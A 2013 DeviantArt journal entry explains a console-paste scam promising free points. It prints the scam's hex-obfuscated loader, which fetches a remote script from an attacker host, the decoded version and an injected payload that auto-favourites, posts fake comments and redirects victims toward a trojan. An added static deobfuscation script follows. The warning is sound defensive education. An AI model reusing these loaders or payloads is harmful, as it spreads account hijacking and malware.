ibelcomputing (Alberto Cruz), Mexico
20K points scam (attack)

Journal Entry: Wed Apr 24, 2013, 7:07 PM
Hello everyone,

Recently there have been several picture-spam accounts instructing users to copy and paste some code into Firefox's or Chrome's web console, claiming they will win 20,000 dA points. Nothing could be further from the truth. Remember kids, there is no such thing as a free lunch. So, DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE.

I would like to give you all an explanation of why and how these scams work. I know not everyone is familiar with computer stuff, so I will skip some details:

Scripts received from the internet are not executed on their own; they are only interpreted by your web browser when it is told to run them. Seeing their code is one thing, executing it is another. That being said, this journal entry is completely harmless because it only shows the code as content and doesn't execute anything, and the malicious deviation page itself can't execute it either, so don't worry. You execute it manually by pasting it into the console. That's why I said "DON'T PASTE ANYTHING YOU DON'T KNOW INTO THE CONSOLE" up there, and it is the reason the attacker instructs users to do so: this is how these commands can actually "come to life" and do harm. If you are interested in more technical details you can google "cross-site scripting".

The attacker uses a social-engineering technique, something that may sound attractive to the target audience, to make potential victims do whatever the attacker wants them to do. In this case, he is offering 20,000 dA points.

The code, located in the description, is obfuscated to mask its real, malicious intent. It may look something like this:

var _0xaed7=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"];document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];

Remember that all code shown is harmless in this state. It is only when you paste it into the console that it wreaks havoc. Let's see what this does:
This is in fact hex-escaped text: each \xNN value corresponds to one ASCII character. Decoded into readable ASCII, the code looks like this (spaces added to the link to avoid making it clickable):

var _0xaed7=["src","script","createElement","appendChild","body","h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r / m i x . j s"];
document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];

It does the following:
1. The first line creates an array of strings, which are in fact a link and some instructions for the browser.
2. The second line reads them back in a different order (remembering that arrays begin at the "0th" element): the 4th, 3rd, 2nd, 1st, 0th and 5th elements. Put together, they form this:
document body appendChild ( createElement ( script ) src =  h t t p : / / d e v i a n t a r t . h p .a f .c m / g e n e r a t o r / m i x . j s
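As an added illustration of the decoding just described (this is not code from the journal), the following script undoes this kind of obfuscation statically, without running anything: it decodes the \xNN escapes, substitutes the array references back into the second line, and lists the URLs hidden in the array. The sample it parses is constructed in the same shape as the scam code, with the attacker's host replaced by the placeholder example.invalid.

```javascript
// Static analysis of the "hex-escaped string array" obfuscation shown above.
// Nothing from the sample is executed; the script is only parsed as text.

// Constructed sample in the same shape as the scam code, with the attacker's
// host replaced by the placeholder example.invalid (String.raw keeps the \x
// escapes literal so the decoder, not the JS parser, has to resolve them).
const SAMPLE = String.raw`var _0xaed7=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C\x65\x2E\x69\x6E\x76\x61\x6C\x69\x64\x2F\x6D\x69\x78\x2E\x6A\x73"];document[_0xaed7[4]][_0xaed7[3]](document[_0xaed7[2]](_0xaed7[1]))[_0xaed7[0]]=_0xaed7[5];`;

// Each \xNN escape is exactly one ASCII character; decode without eval.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Find `var <name>=[ "...", "..." ]` and return the decoded strings plus
// where the declaration ends, so the rest of the script can be rewritten.
function extractStringArray(src) {
  const m = src.match(/var\s+(\w+)\s*=\s*\[([^\]]*)\]/);
  if (!m) return null;
  const items = [];
  const lit = /"((?:[^"\\]|\\.)*)"/g;
  let q;
  while ((q = lit.exec(m[2])) !== null) items.push(decodeHexEscapes(q[1]));
  return { name: m[1], items, end: m.index + m[0].length };
}

// Substitute every <name>[i] with its decoded literal: the reader sees
// document["body"]["appendChild"](...) instead of _0xaed7[4], _0xaed7[3], ...
function deobfuscate(src) {
  const arr = extractStringArray(src);
  if (!arr) return { strings: [], readable: decodeHexEscapes(src) };
  const ref = new RegExp(arr.name + '\\[(\\d+)\\]', 'g');
  const body = src.slice(arr.end).replace(/^\s*;/, '');
  const readable = body.replace(ref, (_, i) => JSON.stringify(arr.items[Number(i)] ?? ''));
  return { strings: arr.items, readable };
}

// Triage view for a defender: which URLs were hidden in the array, and does
// the rewritten code match the remote-script-loader pattern from the journal?
function triage(src) {
  const { strings, readable } = deobfuscate(src);
  const urls = strings.filter((s) => /^https?:\/\//i.test(s));
  const loadsRemoteScript =
    /"createElement"\]\("script"\)/.test(readable) && /\["src"\]=/.test(readable) && urls.length > 0;
  return { urls, loadsRemoteScript, readable };
}

console.log(triage(SAMPLE));
```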


When copied and pasted into the console, this script is assembled and executed, injecting the contents of the JavaScript file hosted on the attacker's website (which, going by the .cm top-level domain at the end of the hostname, is registered in Cameroon) into the deviation page. But that's not all. The JavaScript injected is this:

document.getElementById("gmi-ResourceViewFaveButton").click();
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";

setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();

window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r ';
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')

When executed, it does the following:
- document.getElementById("gmi-ResourceViewFaveButton").click(); makes the browser click the favorite button automatically, so the deviation appears in other deviants' favorites and spreads further.
- document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!"; works like the previous line: it fills in the comment box so that a comment saying "It actually works! Wohoooooooo! Thanks!" is posted on your behalf.
- setTimeout("document.getElementsByClassName('ll f')[0].click()", 100); makes the browser press the "Comment" button after a short delay, since the post button is disabled by default until a comment has been written.
- window.top.location.href='h t t p : / / d e v i a n t a r t . h p . a f . c m / g e n e r a t o r '; sends the browser to the attacker's web page.
- alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed') shows a small dialog telling the victim they are being redirected to the attacker's "generator".

Finally, that page is nothing more than an attempt to lure you into installing a trojan, claiming it is a plugin necessary to display the generator, which gives the attacker complete control over the victim's computer.

Everybody knows about the phony dA login screens floating around. But beware of what you do for freebies; it might be just as bad for your account. Fortunately, dA has been fast at taking down these accounts. Unfortunately, they keep appearing. So, what better way to avoid attacks than knowing they exist?
